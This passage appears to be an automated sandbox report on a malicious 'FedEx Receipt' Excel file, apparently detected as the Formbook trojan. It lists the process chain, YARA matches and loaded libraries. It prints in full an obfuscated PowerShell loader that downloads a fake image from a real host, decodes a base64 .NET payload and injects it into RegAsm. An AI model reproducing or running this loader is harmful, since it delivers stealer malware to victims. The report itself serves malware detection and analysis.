Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D663	12_2_0042D663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040FF7A	12_2_0040FF7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040FF83	12_2_0040FF83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040278D	12_2_0040278D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402790	12_2_00402790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239E2E9	12_2_0239E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A2305	12_2_023A2305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023EA37B	12_2_023EA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023C63DB	12_2_023C63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024463BF	12_2_024463BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239E0C6	12_2_0239E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023EA634	12_2_023EA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02442622	12_2_02442622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A4680	12_2_023A4680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023AE6C1	12_2_023AE6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023AC7BC	12_2_023AC7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242443E	12_2_0242443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023E6540	12_2_023E6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024205E3	12_2_024205E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023BC5F0	12_2_023BC5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02426BCB	12_2_02426BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0244CBA4	12_2_0244CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023C286D	12_2_023C286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023AC85C	12_2_023AC85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023EC920	12_2_023EC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A29B2	12_2_023A29B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024349F5	12_2_024349F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B69FE	12_2_023B69FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0244098E	12_2_0244098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D2E2F	12_2_023D2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023BEE4C	12_2_023BEE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B0F3F	12_2_023B0F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02412FDC	12_2_02412FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243CFB1	12_2_0243CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242AC5E	12_2_0242AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02442C9C	12_2_02442C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D0D3B	12_2_023D0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023ACD5B	12_2_023ACD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02441238	12_2_02441238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A7353	12_2_023A7353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239F3CF	12_2_0239F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0241D06D	12_2_0241D06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023CD005	12_2_023CD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B905A	12_2_023B905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A3040	12_2_023A3040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242D13F	12_2_0242D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243771D	12_2_0243771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242579A	12_2_0242579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D57C3	12_2_023D57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023DD47D	12_2_023DD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B1489	12_2_023B1489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D5485	12_2_023D5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A351F	12_2_023A351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024435DA	12_2_024435DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02453A83	12_2_02453A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023C7B00	12_2_023C7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242DBDA	12_2_0242DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239FBD7	12_2_0239FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0241F8C4	12_2_0241F8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243F8EE	12_2_0243F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242394B	12_2_0242394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02425955	12_2_02425955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023CDF7C	12_2_023CDF7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242BF14	12_2_0242BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243FDDD	12_2_0243FDDD

Document contains embedded VBA macros

Source: FedEx Receipt_53065724643.xls

OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: FedEx Receipt_53065724643.xls

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFE1D622D06AD63FEF.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF5C7C8EE0310B7690.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp.4.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0239E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0240F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 023E3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 023E373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0239DF5C appears 137 times

Yara signature match

Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@11/41@9/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\I0GD6N06.txt

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8313.tmp

Jump to behavior

Source: FedEx Receipt_53065724643.xls	OLE indicator, Workbook stream: true
Source: B9930000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: FedEx Receipt_53065724643.xls	Virustotal: Detection: 29%
Source: FedEx Receipt_53065724643.xls	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

